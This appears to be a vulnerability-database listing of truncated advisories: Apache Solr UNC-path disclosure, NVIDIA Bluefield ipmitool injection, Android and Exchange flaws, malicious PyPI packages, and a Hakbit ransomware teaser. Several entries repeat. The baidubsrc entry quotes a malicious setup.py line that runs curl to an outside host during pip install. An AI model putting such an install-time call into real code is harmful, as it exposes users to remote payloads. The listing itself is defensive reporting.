Malicious code in baidubsrc (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd setup.py executes os.system"curl xiangyangt.com/pypi" unconditionally during pip install. This is an unauthenticated plaintext HTTP request to a...

CVE-2023-31037

NVIDIA Bluefield 2 and Bluefield 3 DPU BMC contains a vulnerability in ipmitool, where a root user may cause code injection by a network call. A successful exploit of this vulnerability may lead to code execution on the OS...

EUVD-2022-0662

Malicious code in bioql PyPI...

EUVD-2023-35374

Malicious code in bioql PyPI...

CVE-2023-21033

In addNetwork of WifiManager.java, there is a possible way to trigger a persistent DoS due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android...

BIT-SOLR-2021-44548 Apache Solr information disclosure vulnerability through DataImportHandler

An Improper Input Validation vulnerability in DataImportHandler of Apache Solr allows an attacker to provide a Windows UNC path resulting in an SMB network call being made from the Solr host to another host on the network. If the attacker has wider access to the network, this may lead to SMB...

CVE-2023-31037

NVIDIA Bluefield 2 and Bluefield 3 DPU BMC contains a vulnerability in ipmitool, where a root user may cause code injection by a network call. A successful exploit of this vulnerability may lead to code execution on the OS...

CVE-2023-31037

NVIDIA Bluefield 2 and Bluefield 3 DPU BMC contains a vulnerability in ipmitool, where a root user may cause code injection by a network call. A successful exploit of this vulnerability may lead to code execution on the OS...

CVE-2023-31037

NVIDIA Bluefield 2 and Bluefield 3 DPU BMC contains a vulnerability in ipmitool, where a root user may cause code injection by a network call. A successful exploit of this vulnerability may lead to code execution on the OS...

Security Update for Azure Identity Module (October 2023)

The version of Azure Identity installed on the remote host is prior to 3.3.1. It is, therefore, affected by a remote code execution vulnerability: As an authenticated user, the attacker could attempt to trigger malicious code in the context of the server's account through a network call. The...

The vulnerability of the Microsoft Exchange Server email server is related to access control errors, which allow a hacker to execute arbitrary code within the context of the server’s user account.

The vulnerability of Microsoft Exchange Server is related to access control errors. Exploiting this vulnerability allows a malicious actor to execute arbitrary code within the server’s account context through a remote network call...

Apache Solr < 8.11.1 Information Disclosure

The version of Apache Solr running on the remote host is prior to 8.11.1. It is, therefore, affected by an information disclosure vulnerability due to improper input validation in DataImportHandler. The vulnerability allows an attacker to provide a Windows UNC path resulting in an SMB network cal...

GHSA-PCCR-Q7V9-5F27 Apache Solr Improper Input Validation and Path Traversal

An Improper Input Validation vulnerability in DataImportHandler of Apache Solr allows an attacker to provide a Windows UNC path resulting in an SMB network call being made from the Solr host to another host on the network. If the attacker has wider access to the network, this may lead to SMB...

CVE-2021-44548

An Improper Input Validation vulnerability in DataImportHandler of Apache Solr allows an attacker to provide a Windows UNC path resulting in an SMB network call being made from the Solr host to another host on the network. If the attacker has wider access to the network, this may lead to SMB...

CVE-2021-44548

An Improper Input Validation vulnerability in DataImportHandler of Apache Solr allows an attacker to provide a Windows UNC path resulting in an SMB network call being made from the Solr host to another host on the network. If the attacker has wider access to the network, this may lead to SMB...

Input validation

An Improper Input Validation vulnerability in DataImportHandler of Apache Solr allows an attacker to provide a Windows UNC path resulting in an SMB network call being made from the Solr host to another host on the network. If the attacker has wider access to the network, this may lead to SMB...

CVE-2021-44548 Apache Solr information disclosure vulnerability through DataImportHandler

An Improper Input Validation vulnerability in DataImportHandler of Apache Solr allows an attacker to provide a Windows UNC path resulting in an SMB network call being made from the Solr host to another host on the network. If the attacker has wider access to the network, this may lead to SMB...

CVE-2021-44548

An Improper Input Validation vulnerability in DataImportHandler of Apache Solr allows an attacker to provide a Windows UNC path resulting in an SMB network call being made from the Solr host to another host on the network. If the attacker has wider access to the network, this may lead to SMB...

TAU Threat Analysis: Relations to Hakbit Ransomware

See part one of TAU's Hakbit Ransomware analysis here. Many blue team defenders out there will attest to the fact that ransomware is on the rise, and that ransomware doesn’t appear to be going away any time soon. Ransomware is only one of the numerous types of commodity-based emerging threats whi...